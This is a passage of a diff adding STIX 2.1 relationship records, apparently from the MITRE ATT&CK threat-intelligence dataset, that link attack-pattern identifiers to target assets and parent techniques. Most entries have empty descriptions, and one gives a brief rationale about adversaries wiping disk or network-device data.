+ "type": "relationship", + "spec_version": "2.1", + "id": "relationship--70847f82-4c34-4b78-a5aa-dfd16e2d259f", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7097c7b2-9266-4659-955b-38214d5ada8c", + "created": "2023-02-21T19:38:13.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-21T19:38:13.470Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8861073d-d1b8-4941-82ce-dce621d398f0", + "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--70adbad4-5196-4170-9c30-9a34b2ef4a01", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--70e38acb-22dd-48ad-897d-fe9028e0b2c3", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--70e5fbfb-746e-4e93-ba17-e33fd904d20c", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71049cf9-8d1d-496a-8489-75f46145f2cf", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--710e0b13-8c20-4537-8625-d958d8a77749", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--710e234a-6a3a-4d71-a332-aef9ad3e352a", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--712f8b41-0072-478a-8128-926683f5aaab", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--713497d5-69da-4962-a4f1-19818c42be86", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7139ac4a-7ece-47da-a5e5-0da99847d6fa", + "created": "2023-03-14T17:36:01.095Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-14T17:36:01.095Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71445f0a-0fd9-4aa5-b831-289c6b0770f3", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--714cc86b-2dd9-4780-a8d4-d70468e37994", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--716512ac-68bd-4864-badd-80a8c5e9ca80", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71856525-a57e-4d17-9057-fdf998773016", + "created": "2022-09-30T21:14:12.377Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T21:14:12.377Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e5d550f3-2202-4634-85f2-4a200a1d49b3", + "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--718fad77-0006-461a-9a46-337defcf44ac", + "created": "2020-01-22T15:05:05.777Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", + "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71985260-c447-430e-b25f-8176a699930a", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71a2c3f5-7383-4bd8-a830-dc2aae62a977", + "created": "2023-09-28T19:55:37.459Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:55:37.459Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71a6a6b3-bc74-4d4d-9767-172a4b2ed783", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71aca8ff-1ac7-4d62-b388-ef4605cf8d4b", + "created": "2022-04-22T18:49:20.528Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-25T14:00:00.188Z", + "description": "", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", + "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71b35daa-36ce-4450-8805-f89f3f5377bb", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71c1480c-6847-4762-9f06-b8320779f6a1", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71c8936e-c742-4060-a5d1-0175a9420ea5", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--71fce98c-3e12-41b5-9b82-f7fcf9280ca2", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--722fe074-ce82-4e84-a244-d32f3e6dd4cd", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7232cabc-fc37-472d-9581-fd314ca04110", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--723b4534-34cc-4b65-9547-f461cb744586", + "created": "2020-03-15T00:40:27.649Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "target_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72411018-3d18-40ac-ab0c-928f2c1f51a6", + "created": "2024-06-27T09:22:51.276Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:22:51.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7249c0d4-36c5-4260-8553-eac169e5a9e3", + "created": "2024-06-27T09:45:03.232Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:45:03.232Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72534a82-12ed-426a-98b4-b2502ab88e29", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--726b728b-d792-4277-b1a3-5e7cd45531d9", + "created": "2024-06-27T08:54:32.619Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:54:32.619Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--727e3638-b203-4bf8-8d00-e06bd6d01b3f", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72855f59-9302-4568-b5c9-c5aa7d233815", + "created": "2024-05-23T04:16:16.135Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:34:00.312Z", + "description": "Asset Mapping Rationale: Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. On network devices, adversaries may wipe configuration files and other data from the device using Network Device CLI commands such as erase", + "relationship_type": "targets", + "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72c40f99-d472-4ada-aa1e-83368b5faf8d", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72c7d370-0449-451d-9ee2-012982634adb", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72c8fd8f-5df2-4967-b2d3-ffeda7018aab", + "created": "2024-06-26T13:51:26.574Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:51:26.574Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72e28554-b1ad-42c4-8f02-103f31f833f5", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72e44eac-8a04-4b9e-93ee-c09142967d3f", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--72f820b3-2df6-4048-bf99-7c7891d276a4", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": 